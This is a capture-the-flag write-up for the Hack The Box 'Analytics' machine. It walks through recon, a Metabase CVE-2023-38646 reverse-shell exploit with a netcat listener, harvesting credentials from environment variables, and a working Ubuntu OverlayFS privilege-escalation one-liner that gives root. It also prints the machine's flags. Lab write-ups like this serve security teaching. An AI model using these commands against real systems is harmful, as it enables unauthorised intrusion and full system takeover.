[HTB] Analytics

First Post:

Last Update:
OS:Linux Linux
Difficulty: Easy
Author: 7u9y & TheCyberGeek
Release Date: October 7, 2023

Recon

nmap

1
$ nmap -sC -sV 10.10.11.233

nmap scan

We can see there is a http page running on port 80
Also we add the domain to the /etc/hosts file

/etc/hosts

Web Page

After looking around the website, when I pressed the login button, it took me to the data.analytical.htb subdomain
So we update the hosts file again and we get a login page

login page url
/etc/hosts 2

The login page:
login page

After searching for a Metabase exploit, I came across CVE-2023-38646

This vulnerability allows us to execute code without any authentication

Exploit

setup-token

We head to the url specified in the previous link (data.analytical.htb/api/sessions/properties) and search for setup-token

setup-token
As we can see, the setup-token is leaking, which means it is vulnerable to the exploit

Run the exploit

Download the exploit

Setup a netcat listener.

1
$ nc -lvnp 1234

While the listener is running, run the exploit

1
$ python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost <Attacker IP> --lport 1234

After the exploit runs, we get a shell as the user metabase.
shell

Docker Container

We are now in a docker container.
However, if we check the environment variables, we get a user and password

1
$ env

env command

SSH and user flag

We can now use the credentials obtained to ssh as the user metalytics

1
$ ssh metalytics@10.10.11.233

We are now logged in as metalytics.

1
2
$ whoami
metalytics

We can now get the user.txt flag

1
2
$ cat /home/metalytics/user.txt
a6c6422a0c214ffd37f50a632abeb48d

PrivEsc

Ubuntu LPE

No sudo commands can be run.
I searched for exploits on the running OS version, which is 22.04.2-Ubuntu

1
$ uname -a

Ubuntu Version

I found this Ubuntu LPE exploit

First i tried to run the command “id” and see if I would get root back

1
2
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

root uid
We got the root id, which means the command is being executed as root

So I change the command to run a bash shell

1
2
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

We now have a shell as root

1
2
$ whoami
root

All we have left to do is get the root flag

1
2
$ cat /root/root.txt
e7cea9c28a9c3460c2fd69964833561b